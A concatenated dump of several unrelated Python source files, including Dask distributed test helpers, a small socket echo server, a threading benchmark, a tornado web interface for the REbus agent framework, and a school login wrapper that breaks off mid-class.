async def read(self, deserializers=None):
msg = await self.comm.read(deserializers=deserializers)
if self.read_queue:
await self.read_queue.put((self.comm.peer_address, msg))
if self.read_event:
await self.read_event.wait()
return msg
class _LockedCommPool(ConnectionPool):
"""A ConnectionPool wrapper to intercept network traffic between servers
This wrapper can be attached to a running server to intercept outgoing read or write requests in test environments.
Examples
--------
>>> w = await Worker(...)
>>> read_event = asyncio.Event()
>>> read_queue = asyncio.Queue()
>>> w.rpc = _LockedCommPool(
w.rpc,
read_event=read_event,
read_queue=read_queue,
)
# It might be necessary to remove all existing comms
# if the wrapped pool has been used before
>>> w.remove(remote_address)
>>> async def ping_pong():
return await w.rpc(remote_address).ping()
>>> with pytest.raises(asyncio.TimeoutError):
>>> await asyncio.wait_for(ping_pong(), 0.01)
>>> read_event.set()
>>> await ping_pong()
"""
def __init__(
self, pool, read_event=None, read_queue=None, write_event=None, write_queue=None
):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.pool = pool
def __getattr__(self, name):
return getattr(self.pool, name)
async def connect(self, *args, **kwargs):
comm = await self.pool.connect(*args, **kwargs)
return LockedComm(
comm, self.read_event, self.read_queue, self.write_event, self.write_queue
)
def xfail_ssl_issue5601():
"""Work around https://github.com/dask/distributed/issues/5601 where any test that
inits Security.temporary() crashes on MacOS GitHub Actions CI
"""
pytest.importorskip("cryptography")
try:
Security.temporary()
except ImportError:
if MACOS:
pytest.xfail(reason="distributed#5601")
raise
def assert_worker_story(
story: list[tuple], expect: list[tuple], *, strict: bool = False
) -> None:
"""Test the output of ``Worker.story``
Parameters
==========
story: list[tuple]
Output of Worker.story
expect: list[tuple]
Expected events. Each expected event must contain exactly 2 less fields than the
story (the last two fields are always the stimulus_id and the timestamp).
Elements of the expect tuples can be
- callables, which accept a single element of the event tuple as argument and
return True for match and False for no match;
- arbitrary objects, which are compared with a == b
e.g.
.. code-block:: python
expect=[
("x", "missing", "fetch", "fetch", {}),
("gather-dependencies", worker_addr, lambda set_: "x" in set_),
]
strict: bool, optional
If True, the story must contain exactly as many events as expect.
If False (the default), the story may contain more events than expect; extra
events are ignored.
"""
now = time()
prev_ts = 0.0
for ev in story:
try:
assert len(ev) > 2
assert isinstance(ev, tuple)
assert isinstance(ev[-2], str) and ev[-2] # stimulus_id
assert isinstance(ev[-1], float) # timestamp
assert prev_ts <= ev[-1] # Timestamps are monotonic ascending
# Timestamps are within the last hour. It's been observed that a timestamp
# generated in a Nanny process can be a few milliseconds in the future.
assert now - 3600 < ev[-1] <= now + 1
prev_ts = ev[-1]
except AssertionError:
raise AssertionError(
f"Malformed story event: {ev}\nin story:\n{_format_story(story)}"
)
try:
if strict and len(story) != len(expect):
raise StopIteration()
story_it = iter(story)
for ev_expect in expect:
while True:
event = next(story_it)
# Ignore (stimulus_id, timestamp)
event = event[:-2]
if len(event) == len(ev_expect) and all(
ex(ev) if callable(ex) else ev == ex
for ev, ex in zip(event, ev_expect)
):
break
except StopIteration:
raise AssertionError(
f"assert_worker_story({strict=}) failed\n"
f"story:\n{_format_story(story)}\n"
f"expect:\n{_format_story(expect)}"
) from None
def _format_story(story: list[tuple]) -> str:
if not story:
return "(empty story)"
return "- " + "\n- ".join(str(ev) for ev in story)
class BrokenComm(Comm):
peer_address = ""
local_address = ""
def close(self):
pass
def closed(self):
return True
def abort(self):
pass
def read(self, deserializers=None):
raise OSError()
def write(self, msg, serializers=None, on_error=None):
raise OSError()
def has_pytestmark(test_func: Callable, name: str) -> bool:
"""Return True if the test function is marked by the given @pytest.mark.<name>;
False otherwise.
FIXME doesn't work with individually marked parameters inside
@pytest.mark.parametrize
"""
marks = getattr(test_func, "pytestmark", [])
return any(mark.name == name for mark in marks)
|
server.py
|
import socket
import multiprocessing as mp
def chat(conn, addr):
while True:
msg = conn.recv(1024).decode("utf-8")
conn.send((msg + " too").encode("utf-8"))
print(addr, ": ", msg)
conn.close()
if __name__ == "__main__":
sk = socket.socket()
sk.bind(("127.0.0.1", 9000))
sk.listen()
print("start server 127.0.0.1:9000 ...")
while True:
conn, addr = sk.accept()
mp.Process(target=chat, args=(conn, addr)).start()
sk.close()
|
thread_test.py
|
import time
import threading
from threading import Thread
from smac.examples.mlp import Mlp
import numpy as np
def threadFunc(threadName):
print("\r\n%s start" % threadName)
time.sleep(5)
print("\r\n%s end" % threadName)
pass
class AgentThread(Thread):
def __init__(self, agent_id, obs, avail_actions):
super(AgentThread, self).__init__()
self.agent_id = agent_id
self.obs = obs
self.avail_actions = avail_actions
def run(self):
start_time = time.time()
# print(f'thread {threading.current_thread().name} starts')
# avail_actions = env.get_avail_agent_actions(self.agent_id)
avail_actions_ind = np.nonzero(self.avail_actions)[0]
# obs = env.get_obs_agent(self.agent_id)
nn_model = Mlp(avail_actions_ind.size)
action_index = np.argmax(nn_model(np.expand_dims(np.array(self.obs), axis=0)))
self.action = avail_actions_ind[action_index]
# self.action = 4
run_time = time.time() - start_time
def get_action(self):
return self.agent_id, self.action
start = time.time()
threads = []
obs = np.random.random(size=(5050,)).astype(np.float32)
avail_actions = [1] * 16
for agent in range(1000):
# thread = threading.Thread(target=threadFunc, args=("Thread%s" % index,))
thread = AgentThread(agent, obs, avail_actions)
thread.start()
threads.append(thread)
for t in threads:
t.join()
print("thread finished , cost %s s" % (time.time() - start))
|
web_interface.py
|
import os
import os.path
from rebus.agent import Agent
import threading
import datetime
import time
import tornado.autoreload
import tornado.ioloop
import tornado.web
import tornado.template
from rebus.tools.selectors import guess_selector
from rebus.descriptor import Descriptor
import re
import json
class AsyncProxy(object):
"""
Provides methods for making API requests from the main thread.
When DBus is used, DBus method calls must not be called from the tornado
thread; symptoms include expired 25s DBus timeouts, during which the web
server freezes.
"""
def __init__(self, agent):
self._agent = agent
def __getattr__(self, attr):
if not attr.startswith('async_'):
raise AttributeError
method_name = attr[6:]
if hasattr(self, method_name + '_buscallback'):
method = None
bus_callback = getattr(self, method_name + '_buscallback')
else:
method = getattr(self._agent.bus, method_name)
def bus_callback(method, callback, *args):
results = method(self._agent, *args)
self._agent.ioloop.add_callback(callback, results)
# dbus-specific - indicates this method should only be called
# once
return False
def _async(callback, *args):
self._agent.bus.busthread_call(bus_callback, method, callback,
*args)
return _async
def getwithvalue_buscallback(self, method, callback, *args):
"""
Ensures descriptor's values are retrieved before passing a descriptor
to the web server thread, to avoid DBus calls when the value @property
is read.
"""
desc = self._agent.bus.get(self._agent, *args)
if desc:
# force value retrieval
value = desc.value
self._agent.ioloop.add_callback(callback, desc)
return False
def find_by_uuid_withvalue_buscallback(self, method, callback, *args):
"""
Ensures descriptor's values are retrieved before passing a descriptor
to the web server thread, to avoid DBus calls when the value @property
is read.
"""
descs = self._agent.bus.find_by_uuid(self._agent, *args)
# force value retrieval
for desc in descs:
value = desc.value
self._agent.ioloop.add_callback(callback, descs)
return False
@Agent.register
class WebInterface(Agent):
_name_ = "web_interface"
_desc_ = "Display all descriptors exchanged on the bus in a web interface"
@classmethod
def add_arguments(cls, subparser):
subparser.add_argument(
'--autoreload', action='store_true',
help='Auto reload static files - use for development')
subparser.add_argument(
'-p', '--port', type=int, default=8080,
help='Specify alternate port')
def init_agent(self):
# Build list of async methods, to be used from the tornado thread
self.async_proxy = AsyncProxy(self)
self.dstore = DescriptorStore(self, self.async_proxy)
self.ioloop = tornado.ioloop.IOLoop.instance()
self.gui = Application(self.dstore, self.async_proxy, self.ioloop,
autoreload=self.config['autoreload'])
self.gui.listen(self.config['port'])
t = threading.Thread(target=self.ioloop.start)
t.daemon = True
t.start()
def process(self, descriptor, sender_id):
# tornado version must be >= 3.0
# force value retrieval
value = descriptor.value
self.ioloop.add_callback(self.dstore.new_descriptor, descriptor,
sender_id)
class CustomTemplate(tornado.template.Template):
"""
Keeps a dict of functions to be passed to the template at generation time.
Useful for preprocessing/formatting data.
For 'analysis' and 'monitor' actions, the RequestHandler is expected to
pass a 'descrinfos' variable to the template, containing a dictionnary.
For 'view' actions, the RequestHandler is expected to pass a descriptor
variable that contains the raw descriptor.
"""
def __init__(self, template_string, **kwargs):
if 'functions' in kwargs:
self._functions = kwargs['functions']
del kwargs['functions']
else:
self._functions = dict()
super(CustomTemplate, self).__init__(template_string, **kwargs)
def generate(self, **kwargs):
kwargs.update(self._functions)
return super(CustomTemplate, self).generate(**kwargs)
class TemplateLoader(tornado.template.Loader):
"""
Use parent class Loader to load any template other than descriptors.
To render descriptor of type "desctype" (first selector part, e.g.
"matrix"), for page "thepage", try to use
templates/descriptor/desctype_thepage. If it does not exist, use
templates/descriptor/default_thepage.
Load descriptor templates either from the descriptor/ folders, or using
agent-registered templates (allows agents that live outside the rebus
repository to specify how to render their custom desctypes).
To render any other type of templates (e.g. /analysis page), use static
template files in templates/
"""
#: contains descriptor templates that have been registered by external (out
#: of rebus) agents, as well of static files that are part of rebus
templates = dict()
def __init__(self, root_directory=None, **kwargs):
"""
Register existing static files
"""
if not root_directory:
root_directory = os.path.join(os.path.dirname(__file__),
'templates')
super(TemplateLoader, self).__init__(root_directory, **kwargs)
for fname in os.listdir(os.path.join(root_directory, "descriptor")):
fullpath = os.path.join(root_directory, "descriptor", fname)
self.register_file_descriptor_template(fullpath, fname)
def register_file_descriptor_template(self, fullpath, fname):
if not (fname.endswith('.html') and os.path.isfile(fullpath)):
return
#: fname format: desctype_page.html
try:
selector_prefix, page = fname.rsplit('.', 1)[0].rsplit('_', 1)
except ValueError:
raise ValueError("Invalid descriptor template name %s" %
fullpath)
selector_prefix, page = fname.rsplit('.', 1)[0].rsplit('_', 1)
templatestr = open(fullpath, 'rb').read()
functions = dict()
TemplateLoader.register(selector_prefix, page, templatestr,
functions)
@staticmethod
def register(selector_prefix, page, templatestr, functions):
"""
Called to register a renderering template for the given page and
descriptor type.
"""
TemplateLoader.templates[(selector_prefix, page)] = (templatestr,
functions)
@staticmethod
def register_formatted(template):
"""
Helper for registering templates and one associated formatter function.
Syntactic sugar, to be used as a decorator for formatter function.
Sample use:
@TemplateLoader.register_formatted(template='selector_prefix_page.html')
def formatter(...any args, called from template...):
where 'selector_prefix_page.html' is present under the
formatted_templates/ directory under module where this decorator is
being used.
This template will be used on specified page, for selectors beginning
with /selector/prefix, unless another registered template has a longer
selector prefix (e.g. selector_prefix_very_specific_page.html)
"""
def func_wrapper(f):
fpath = os.path.dirname(f.__globals__['__file__'])
templatefile = os.path.join(fpath, 'formatted_templates', template)
templatestr = open(templatefile, 'rb').read()
selector_prefix, page = template.rsplit('.', 1)[0].rsplit('_', 1)
funcdict = {f.__name__: f}
TemplateLoader.register(selector_prefix, page, templatestr,
funcdict)
return f
return func_wrapper
def resolve_path(self, name, parent_path=None):
name = super(TemplateLoader, self).resolve_path(name, parent_path)
return name
def _create_template(self, name):
"""
Return the requested template object.
"""
if not name.startswith('descriptor/'):
return super(TemplateLoader, self)._create_template(name)
# '/' (part of selector) are encoded as '_' in template file names.
# ('_' is forbidden in selectors)
selector, page = name[11:].replace('/', '_').rsplit('_', 1)
args = dict()
args['loader'] = self
# remove 'descriptor/' from template name
# iterate to find template with longest selector prefix
desc_prefix = ""
for (d, p) in TemplateLoader.templates:
if page != p:
continue
if selector.startswith(d) and len(d) > len(desc_prefix):
desc_prefix = d
if desc_prefix != "":
# load most specific template if exists
templatestr, funcs = TemplateLoader.templates[(desc_prefix, page)]
else:
# use default otherwise
templatestr, funcs = TemplateLoader.templates[('default', page)]
args['functions'] = funcs
template = CustomTemplate(templatestr, **args)
return template
class Application(tornado.web.Application):
def __init__(self, dstore, async, ioloop, autoreload):
handlers = [
(r"/", tornado.web.RedirectHandler, {'url': '/monitor'}),
(r"/monitor", MonitorHandler),
(r"/inject", InjectHandler),
(r"/uuid/(.*)", AnalysisListHandler),
(r"/analysis(|/.*)", AnalysisHandler),
(r"/selectors", SelectorsHandler),
(r"/poll_descriptors", DescriptorUpdatesHandler),
(r"/get([^\?]*)\??.*", DescriptorGetHandler),
(r"/agents", AgentsHandler),
(r"/processing/list_processors", ProcessingListHandler),
(r"/processing/request", ProcessingRequestsHandler),
]
params = {
'static_path': os.path.join(os.path.dirname(__file__), 'static'),
'template_loader': TemplateLoader()
}
if autoreload:
params['autoreload'] = True
for path in ('templates', 'static'):
for d, _, files in os.walk(os.path.dirname(__file__), path):
for f in files:
tornado.autoreload.watch(os.path.join(d, f))
self.dstore = dstore
self.async = async
self.ioloop = ioloop
tornado.web.Application.__init__(self, handlers, **params)
class DescriptorStore(object):
def __init__(self, agent, async):
self.async = async
#: self.waiters is a set of (domain, uuid, callback) for new
#: descriptors on specified uuid and domain
#: "domain" and "uuid" may be empty for callback to be called on any
#: value
self.waiters = set()
#: Most recent descriptor is in self.cache[-1].
#: The cache is used:
#:
#: * in the Bus Monitor view when a user first loads the page
#: * in every page that updates dynamically, to cache descriptors
#: between two (long) pollings
self.cache = []
self.cache_size = 200
def wait_for_descriptors(self, callback, domain, uuid, page, cursor):
"""
:param callback: callback function, will be called when necessary
:param domain: domain filter. Empty if any
:param uuid: uuid filter. Empty if any
:param cursor: 'cached', 'all', or hash of the most recent displayed
descriptors.
:param page: string parameter to be passed to callback()
Returns matching descriptor information if available.
Else, registers callback to be called when a matching descriptor is
received.
Usage scenarios:
* Fetch any old descriptor matching uuid and domain. Wait if none
match.
* Fetch matching cached descriptors (domain and uuid may or may not be
specified).
"""
matching_infos = []
if cursor == 'all':
# Search whole bus
# Domain or uuid must be defined
# Wait if none have been found
if domain and uuid:
self.async.async_find_by_uuid_withvalue(callback, domain, uuid)
return
else:
# Return cached descriptors that are newer than cursor (all cached
# if cursor is not in cache anymore).
# Also works for cursor == 'cached'
new_count = 0
for desc in reversed(self.cache):
if desc.hash == cursor:
break
new_count += 1
if new_count > 0:
# New descriptors are available. Send them if they match.
for desc in self.cache[-new_count:]:
if domain == desc.domain or not domain:
if uuid == desc.uuid or not uuid:
matching_infos.append(desc)
if matching_infos:
callback(matching_infos)
return
if matching_infos:
callback(matching_infos)
return
# No new matching descriptors have been found, start waiting
self.add_to_waitlist(domain, uuid, callback)
def add_to_waitlist(self, domain, uuid, callback):
"""
:param callback: method of a RequestHandler instance
"""
self.waiters.add((domain, uuid, callback))
def info_from_descs(self, descriptors):
"""
:param descriptors: list of descriptors
Return a list of descriptor summary dictionnaries
"""
descrinfos = []
for desc in descriptors:
printablevalue = desc.value if isinstance(desc.value, unicode) \
else ''
if len(printablevalue) > 80:
printablevalue = (printablevalue[:80] + '...')
descrinfo = {
'hash': desc.hash,
'domain': desc.domain,
'uuid': desc.uuid,
'agent': desc.agent,
'selector': desc.selector.partition('%')[0],
'fullselector': desc.selector,
'label': desc.label,
'printablevalue': printablevalue,
'processing_time': format(desc.processing_time, '.3f'),
'precursors': desc.precursors,
'version': desc.version,
}
if desc.selector.startswith('/link/'):
descrinfo['value'] = desc.value
descrinfo['linksrchash'] = desc.value['selector'].split('%')[1]
descrinfos.append(descrinfo)
return descrinfos
def cancel_wait(self, callback):
for (domain, uuid, cb) in set(self.waiters):
if callback == cb:
self.waiters.remove((domain, uuid, cb))
def new_descriptor(self, descriptor, sender_id):
"""
:param descriptor: new descriptor
:param sender_id: sender agent ID
Callback function
Called whenever a new descriptor is available (received from bus, or
injected by web_interface)
"""
for (domain, uuid, callback) in list(self.waiters):
if domain == descriptor.domain or not domain:
if uuid == descriptor.uuid or not uuid:
callback([descriptor])
self.waiters.remove((domain, uuid, callback))
self.cache.append(descriptor)
if len(self.cache) > self.cache_size:
self.cache = self.cache[-self.cache_size:]
class AnalysisHandler(tornado.web.RequestHandler):
def get(self, uuid=''):
"""
URL format: /analysis (blank page)
/analysis/domain/aaaaaaaa-1234-5678-abcd-123456789abc
"""
if uuid not in ('', '/') and\
not re.match('/[a-zA-Z0-9-_]+/[0-9a-fA-F-]{36}', uuid):
# invalid uuid
self.send_error(400)
return
self.render('analysis.html', uuid=uuid)
class AnalysisListHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(self, domain):
if domain == '':
domain = 'default'
self.domain = domain
self.application.async.async_list_uuids(self.send_results_cb, domain)
def send_results_cb(self, uuid_label):
if self.request.connection.stream.closed():
return
self.render('uuid.html', domain=self.domain,
selectors=sorted(uuid_label.items(), key=lambda x: x[1]))
class SelectorsHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(self):
self.application.async.async_find(
self.get_selectors_cb,
self.get_argument('domain', 'default'), '/.*', 100)
def get_selectors_cb(self, sels):
self.render('selectors.html', selectors=sorted(sels))
class MonitorHandler(tornado.web.RequestHandler):
def get(self):
self.render('monitor.html')
class DescriptorUpdatesHandler(tornado.web.RequestHandler):
"""
Dispatches descriptors to web clients.
"""
@tornado.web.asynchronous
def post(self):
self.cursor = self.get_argument('cursor')
self.page = self.get_argument('page')
self.domain = self.get_argument('domain')
self.uuid = self.get_argument('uuid')
self.application.dstore.wait_for_descriptors(self.on_new_descriptors,
self.domain, self.uuid,
self.page, self.cursor)
def on_new_descriptors(self, descs):
if self.request.connection.stream.closed():
return
if not descs:
self.application.dstore.add_to_waitlist(self.domain, self.uuid,
self.on_new_descriptors)
return
descrinfos = self.application.dstore.info_from_descs(descs)
#: Contains only data from descrinfos needed to render page
infos = []
for d in descrinfos:
info = {}
infos.append(info)
for k in ('hash', 'selector', 'fullselector', 'printablevalue',
'agent', 'domain', 'label', 'linksrchash',
'version', 'processing_time'):
if k in d:
info[k] = d[k]
if self.page in ('monitor', 'analysis'):
d['html_' + self.page] = \
self.render_string('descriptor%s_%s' % (d['selector'],
self.page),
descriptor=d)
info['html'] = d['html_' + self.page]
self.finish(dict(descrinfos=infos))
def on_connection_close(self):
self.application.dstore.cancel_wait(self.on_new_descriptors)
class DescriptorGetHandler(tornado.web.RequestHandler):
"""
Handles requests for descriptor values.
Values are requested through the bus.
URL format: /get/sel/ector/%1234?domain=default&download=1
The forward slash after "/get" is part of the selector
The selector hash (ex. %1234...) may be replaced with a version (ex. ~-1)
"""
@tornado.web.asynchronous
def get(self, selector='', *args, **kwargs):
domain = self.get_argument('domain', 'default')
self.application.async.async_getwithvalue(self.process_get_results,
domain, selector)
def process_get_results(self, desc):
download = (self.get_argument('download', '0') == '1')
if desc is None:
self.send_error(status_code=404)
return
value = desc.value
if download:
self.set_header('Content-Disposition', 'attachment; filename=%s' %
tornado.escape.url_escape(desc.label))
self.finish(str(value))
else:
if type(value) is list:
self.finish(json.dumps(dict(list=value)))
elif type(value) is dict:
self.finish(json.dumps(value))
else:
self.render('descriptor%s_view' % desc.selector,
descriptor=desc)
class InjectHandler(tornado.web.RequestHandler):
"""
Injects a file to the bus.
"""
def post(self, *args, **kwargs):
t0 = time.time()
self.f = self.request.files['file'][0]
self.filename = self.f['filename']
value = self.f['body']
domain = self.get_argument('domain', 'default')
force_inject = self.get_argument('force_inject', False)
if force_inject is not False:
force_inject = True
agentname = 'web_interface_inject'
selector = guess_selector(buf=value, label=self.filename)
t1 = time.time()
if force_inject:
create_new = Descriptor.new_with_randomhash
else:
create_new = Descriptor
filedesc = create_new(self.filename, selector, value, domain,
agent=agentname, processing_time=t1-t0)
self.uuid = filedesc.uuid
self.desc = filedesc
self.application.async.async_push(self.process_inject_results,
self.desc)
submission_data = {'filename': self.filename,
'date': datetime.datetime.now().isoformat()}
t2 = time.time()
submdesc = filedesc.spawn_descriptor('/submission/',
submission_data,
agentname, processing_time=t2-t1)
self.desc = submdesc
self.application.async.async_push(self.process_inject_results,
submdesc)
self.finish(dict(uuid=self.uuid, filename=self.filename))
def process_inject_results(self, result):
pass
class ProcessingListHandler(tornado.web.RequestHandler):
"""
Lists (agents, config) that could process this descriptor
"""
@tornado.web.asynchronous
def post(self, *args, **kwargs):
domain = self.get_argument('domain')
selector = self.get_argument('selector')
self.application.async.async_get_processable(
self.processing_list_cb, str(domain), str(selector))
def processing_list_cb(self, agents):
agents = [(name, ', '.join(
["%s=%s" % (k, v) for (k, v) in json.loads(config_txt).items()]
)) for (name, config_txt) in agents]
self.finish(self.render_string('request_processing_popover.html',
agents=agents))
class ProcessingRequestsHandler(tornado.web.RequestHandler):
"""
Requests processing of this descriptor by listed agents
"""
def post(self, *args, **kwargs):
params = json.loads(self.request.body)
if not all([i in params for i in ('domain', 'selector', 'targets')]):
self.send_error(400)
if not all([isinstance(i, unicode) for i in params['targets']]):
self.send_error(400)
self.application.async.async_request_processing(
lambda x: None,
str(params['domain']),
str(params['selector']),
list(params['targets']))
self.finish()
class AgentsHandler(tornado.web.RequestHandler):
"""
Displays information about agents.
"""
def get(self):
self.render('agents.html')
@tornado.web.asynchronous
def post(self, *args, **kwargs):
# TODO fetch agents descriptions
domain = self.get_argument('domain', 'default')
self.application.async.async_processed_stats(self.agents_cb1, domain)
def agents_cb1(self, params):
self.processed, self.total = params
self.application.async.async_list_agents(self.agents_cb2)
def agents_cb2(self, res):
agent_count = {k: [k, v, 0] for k, v in res.items()}
for agent, nbprocessed in self.processed:
if agent in agent_count:
# agent is still registered
agent_count[agent][2] = nbprocessed
stats = list()
for agent in sorted(agent_count):
stats.append(agent_count[agent])
self.finish(dict(agents_stats=stats, total=self.total))
|
page.py
|
"""Class 'Page' is a wrapper around requests.Response with convenient
functions.
"""
__all__ = ['Page', 'LoginPageBase', 'AuthPage', 'PowerschoolPage',
'MicrosoftPage', 'PowerschoolLearningPage']
__author__ = 'Thomas Zhu'
import abc
import base64
import hashlib
import hmac
import json
import os
import re
import socket
import subprocess
import sys
import threading
from urllib.parse import urlparse, urljoin
import requests
from bs4 import BeautifulSoup
from ykpstools.exceptions import WrongUsernameOrPassword, GetIPError
class Page(abc.ABC):
"""Class 'Page' is a wrapper around requests.Response with convenient
functions.
"""
def __init__(self, user, response):
"""Initialize a Page.
user: a ykpstools.user.User instance, the User this page belongs to,
response: a requests.Response instance or
a ykpstools.page.Page instance.
"""
self.user = user
if isinstance(response, requests.Response):
self.response = response
elif isinstance(response, Page):
self.response = response.response
def url(self, *args, **kwargs):
"""Get current URL.
*args: arguments for urllib.parse.urlparse,
*kwargs: keyword arguments for urllib.parse.urlparse."""
return urlparse(self.response.url, *args, **kwargs)
def text(self, encoding=None):
"""Returns response text.
encoding=None: encoding charset for HTTP, defaults to obtain from
headers.
"""
if encoding is not None:
self.response.encoding = encoding
return self.response.text
def soup(self, features='lxml', *args, **kwargs):
"""Returns bs4.BeautifulSoup of this page.
features='lxml': 'features' keyword argument for BeautifulSoup,
*args: arguments for BeautifulSoup,
**kwargs: keyword arguments for BeautifulSoup.
"""
return BeautifulSoup(self.text(), features=features, *args, **kwargs)
def CDATA(self):
"""Gets the CDATA of this page."""
return json.loads(re.findall(
r'//<!\[CDATA\[\n\$Config=(.*?);\n//\]\]>', self.text())[0])
def form(self, *find_args, **find_kwargs):
"""Gets HTML element form as bs4.element.Tag of this page.
*find_args: arguments for BeautifulSoup.find('form'),
**find_kwargs: keyword arguments for BeautifulSoup.find('form').
"""
return self.soup().find('form', *find_args, **find_kwargs)
def payload(self, updates={}, *find_args, **find_kwargs):
"""Load completed form of this page.
updates: updates to payload,
*find_args: arguments for BeautifulSoup.find('form'),
**find_kwargs: keyword arguments for BeautifulSoup.find('form').
"""
form = self.form(*find_args, **find_kwargs)
if form is None:
return updates
else:
payload = {
i.get('name'): i.get('value')
for i in form.find_all('input')
if i.get('name') is not None}
payload.update(updates)
return payload
def submit(self, updates={}, find_args=(), find_kwargs={},
*args, **kwargs):
"""Submit form from page.
updates: updates to payload,
find_args: arguments for BeautifulSoup.find('form'),
find_kwargs: keyword arguments for BeautifulSoup.find('form'),
*args: arguments for User.request,
**kwargs: keyword arguments for User.request.
"""
form = self.form(*find_args, **find_kwargs)
if form is None:
return self
else:
method = form.get('method')
action = urljoin(self.url().geturl(), form.get('action'))
payload = self.payload(updates, *find_args, **find_kwargs)
return self.user.request(method, action,
data=payload, *args, **kwargs)
def json(self, *args, **kwargs):
"""Returns response in json format.
*args: arguments for requests.Response.json,
*kwargs: keyword arguments for requests.Response.json.
"""
return self.response.json(*args, **kwargs)
class LoginPageBase(Page):
"""Basic login Page class for pages that involve specific logins."""
def __init__(self, user, *args, **kwargs):
"""Log in to a url in self.login to initialize.
user: a ykpstools.user.User instance, the User this page belongs to,
*args: arguments for self.login,
**kwargs: keyword arguments for self.login.
"""
self.user = user
page = self.login(*args, **kwargs)
super().__init__(self.user, page)
@abc.abstractmethod
def login(self, *args, **kwargs):
"""For login during initialization.
Should override in its subclasses.
"""
page = None # Should override in its subclasses.
return page
class AuthPage(LoginPageBase):
"""Class 'AuthPage' inherits and adds on specific initialization and
attributes for YKPS WiFi Authorization to 'ykpstools.page.Page'.
"""
def __init__(self, user, *args, **kwargs):
"""Log in to WiFi to initialize.
user: a ykpstools.user.User instance, the User this page belongs to.
*args: arguments for POST login
*kwargs: keyword arguments for POST login
"""
super().__init__(user, *args, **kwargs)
def login(self, *args, **kwargs):
"""For login to WiFi during initialization."""
self.mac_connect_to_wifi()
payload = {
'opr': 'pwdLogin',
'userName': self.user.username,
'pwd': self.user.password,
'rememberPwd': '1',
}
return self.user.post('http://1.1.1.3/ac_portal/login.php',
data=payload, *args, **kwargs)
def logout(self, *args, **kwargs):
"""Logouts from YKPS Wi-Fi, with args and kwargs for self.user.get."""
raise NotImplementedError('The school does not implement ajaxlogout.')
@property
def unix_interfaces(self):
if sys.platform == 'darwin':
networksetup = subprocess.check_output(
'networksetup -listallhardwareports |'
'grep "Device: "',
shell=True, stderr=subprocess.DEVNULL).decode()
return [n.strip().split()[-1]
for n in networksetup.splitlines()]
elif sys.platform.startswith('linux'):
return ['eth0', 'wlan0', 'wifi0', 'eth1',
'eth2', 'wlan1', 'ath0', 'ath1', 'ppp0', 'en0', 'en1']
else:
return [NotImplemented]
def mac_connect_to_wifi(self):
if sys.platform == 'darwin':
interface = self.unix_interfaces[0]
is_network_on = subprocess.check_output(
'networksetup -getairportpower {}'.format(interface),
shell=True, stderr=subprocess.DEVNULL
).decode().strip().split()[-1] == 'On'
if not is_network_on:
subprocess.check_output(
'networksetup -setairportpower {} on'.format(interface),
shell=True, stderr=subprocess.DEVNULL)
is_correct_wifi = subprocess.check_output(
'networksetup -getairportnetwork {}'.format(interface),
shell=True, stderr=subprocess.DEVNULL
).decode().strip().split()[-1] in {
'GUEST', 'STUWIRELESS', 'SJWIRELESS'}
if not is_correct_wifi:
subprocess.check_output(
'networksetup -setairportnetwork {} {} {}'.format(
interface, 'STUWIRELESS', ''),
shell=True, stderr=subprocess.DEVNULL)
for i in range(10000):
try:
subprocess.check_output(
'ping 10.2.191.253' # ping blocks until ready
' -c 1 -W 1 -i 0.1', # waits for 0.1 second each loop
shell=True, stderr=subprocess.DEVNULL)
except subprocess.CalledProcessError:
continue
else:
break
else:
pass
@property
def IP(self):
"""Returns IP address in LAN."""
def _is_valid_IP(IP):
"""Internal function. Check if IP is internal IPv4 address."""
if (IP and isinstance(IP, str) and not IP.startswith('127.')
and re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', IP)):
return True
else:
return False
try:
IP = socket.gethostbyname(socket.gethostname())
assert _is_valid_IP(IP)
except (socket.error, AssertionError):
try:
IP = socket.gethostbyname(socket.getfqdn())
assert _is_valid_IP(IP)
except (socket.error, AssertionError):
if sys.platform in {'win32', 'win16', 'dos', 'cygwin'}:
try:
ipconfig = subprocess.check_output('ipconfig /all',
shell=True, stderr=subprocess.DEVNULL).decode()
except subprocess.CalledProcessError as error:
raise GetIPError(
"Can't retrieve IP address.") from error
else:
for ipconfig_line in ipconfig.splitlines():
line = ipconfig_line.strip()
if re.search(r'[\s^]IP(?:v4)?[\s\:$]', line):
# 'IP' or 'IPv4'
IP = line.split()[-1]
if _is_valid_IP(IP):
break
else:
raise GetIPError("Can't retrieve IP address.")
elif (sys.platform == 'darwin'
or sys.platform.startswith('linux')):
interfaces = self.unix_interfaces
for interface in interfaces:
try:
ifconfig = subprocess.check_output(
'ifconfig {} | grep "inet "'.format(interface),
shell=True, stderr=subprocess.DEVNULL).decode()
IP = ifconfig.splitlines()[0].strip().split()[1]
assert _is_valid_IP(IP)
except (subprocess.CalledProcessError,
AssertionError, IndexError):
continue
else:
break
else:
raise GetIPError("Can't retrieve IP address. "
'Maybe your network is disabled or disconnected?')
else:
raise GetIPError('Not implemented OS: ' + sys.platform)
if not _is_valid_IP(IP):
raise GetIPError("Can't retrieve IP address.")
else:
return IP
@property
def MAC(self):
"""Returns MAC address."""
MAC = uuid.UUID(int=uuid.getnode()).hex[-12:].upper()
return ':'.join(MAC[i:i+2] for i in range(0, 11, 2))
class PowerschoolPage(LoginPageBase):
"""Class 'PowerschoolPage' inherits and adds on specific initialization and
attributes for Powerschool to 'ykpstools.page.Page'.
"""
def __init__(self, user):
"""Log in to Powerschool to initialize.
user: a ykpstools.user.User instance, the User this page belongs to.
"""
super().__init__(user)
def login(self):
"""For login to Powerschool during initialization."""
ps_login = self.user.get(
'https://powerschool.ykpaoschool.cn/public/home.html')
if ps_login.url().path == '/guardian/home.html': # If already logged in
return ps_login
payload = ps_login.payload()
payload_updates = {
'dbpw': hmac.new(payload['contextData'].encode('ascii'),
self.user.password.lower().encode('ascii'),
hashlib.md5).hexdigest(),
'account': self.user.username,
'pw': hmac.new(payload['contextData'].encode('ascii'),
base64.b64encode(hashlib.md5(self.user.password.encode('ascii')
).digest()).replace(b'=', b''), hashlib.md5).hexdigest(),
'ldappassword': (self.user.password if 'ldappassword' in payload
else '')
}
submit_login = ps_login.submit(updates=payload_updates)
if submit_login.soup().title.string == 'Student and Parent Sign In':
raise WrongUsernameOrPassword
return submit_login
class MicrosoftPage(LoginPageBase):
"""Class 'MicrosoftPage' inherits and adds on specific initialization and
attributes for Microsoft to 'ykpstools.page.Page'.
"""
